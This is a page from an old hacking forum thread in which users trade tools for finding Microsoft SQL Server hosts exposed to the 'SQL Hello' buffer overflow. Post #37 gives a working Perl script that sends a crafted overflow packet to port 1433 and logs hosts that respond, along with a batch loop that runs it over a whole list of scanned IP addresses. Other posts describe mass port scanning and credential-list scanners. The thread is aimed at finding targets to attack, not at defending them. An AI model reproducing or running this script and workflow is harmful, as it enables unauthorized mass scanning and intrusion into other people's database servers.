Best Sql Hello Vulnerability Scanner

#31 perky

Private First Class

Group: Members
Posts: 32
Joined: 05-October 04

Posted 31 October 2004 - 10:59 AM

ok ! <_<

#32 tuttefrut

Private

Group: Members
Posts: 13
Joined: 17-December 03

Posted 02 November 2004 - 04:28 AM

Quote

Juste make a portscan 1433 with an usual portscanner like scan100 500 or 1000

but then u have to check all ip's for vulnerability
if you have a "sql hello vulnerable scanner" you know wich ip's are vuln. and unprotected ...
that saves a lot of time when you are working with a large scanfile

#33 Source

Private

Group: Members
Posts: 16
Joined: 15-October 04

Post icon Posted 02 November 2004 - 10:12 AM

tuttefrut, on Nov 2 2004, 12:28 PM, said:

Quote

Juste make a portscan 1433 with an usual portscanner like scan100 500 or 1000

<{POST_SNAPBACK}>

True

Or if somone has a batch file that will work with Dfind or somthing. Somthing that will check the ip list to see if there is vun ips to the hello exploit.

any idea's?

#34 Guest_NoRRiS_*

Group: Guests

Posted 04 November 2004 - 01:57 PM

tuttefrut, on Nov 2 2004, 12:28 PM, said:

Quote

Juste make a portscan 1433 with an usual portscanner like scan100 500 or 1000

<{POST_SNAPBACK}>

Yes a real SQLHELLO scanner was beter
But no SQLHELLO exist or it's private ^^

#35 amnesia

Private

Group: Members
Posts: 4
Joined: 13-November 04

Posted 14 November 2004 - 05:57 PM

iiiemuiii, on Sep 24 2004, 08:04 AM, said:

that's just how fast the scanner works. i scanned about 2000 ips in 5-8 seconds.

also u need to make sure the contents in your file must be just the ips.

<{POST_SNAPBACK}>

the attached file is missing. can someone attach it back please?

#36 gunknown

Private First Class

Group: Members
Posts: 32
Joined: 13-November 04

Posted 22 March 2005 - 09:22 AM

EzMe, on Sep 23 2004, 02:13 AM, said:

Usage: sqlhelloscanner2 scan.txt yourip > results.txt

<{POST_SNAPBACK}>

You have to enter your ip so I think the scanner works with an connect back exploit to test for vuln. On which port does it connect back?
Am I right that the sqlhello source code is still private?

#37 touk

Private First Class

Group: Members
Posts: 94
Joined: 11-February 04

Posted 23 March 2005 - 06:50 AM

#!/usr/bin/perl
# code by touk
# for MxMx & GSO
# Vulnerable hosts are in vulnerables.txt
# This file needs to be named: vcsqlhello.pl


use IO::Socket;
use IO::File;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s}))
{
print "00ps, vcsqlhello.pl -s ipaddress!";
exit;
}
$serv = $args{s};
$bof="\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b"; #header
$bof.="\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02"; #header
$bof.="\x10\x00\x00\x00"; #header
$bof.="\x00\x24\x01\x00\x00"; #tail

$bof.="crap"x560; # crapmsg
$remote = IO::Socket::INET->new(
                   Proto       => "tcp",
                   PeerAddr    => $args{s},
                   PeerPort    => "(1433)",
               ) || die("[*] Server Down?\n");
print"[*] Sending VC string\n";
$remote->autoflush(1);
print $remote "$bof";
print("[*] All Done...\n");
$remote->recv($answer,4096);
   if($answer ne '')
   {

print "[*] Vulnerable";
$resultfile = "vulnerables.txt";
$fh = IO::File->new("+>> $resultfile")or die "Couldn't open $file for writing: $!\n";
open(FH, "+>> $resultfile")                                 or die $!;
print FH "$args{s}\n";
close(FH);
}
else{
 print "[*] Not Vulnerable";
 exit 1;
}
sleep(2);

autochecker.bat : FOR /F "tokens=1* delims=," %%i in (scan.txt) do vcsqlhello.pl -s %%i

#38 Guest_blumaster_*

Group: Guests

Posted 29 March 2005 - 03:59 AM

i thing that for me the best scanner for sql is Xray,but i'm using also Xscan with modificated file .dat where are the user and password.

(3 Pages)
←
1
2
3

You cannot start a new topic
You cannot reply to this topic

Forums: Best Sql Hello Vulnerability Scanner - Forums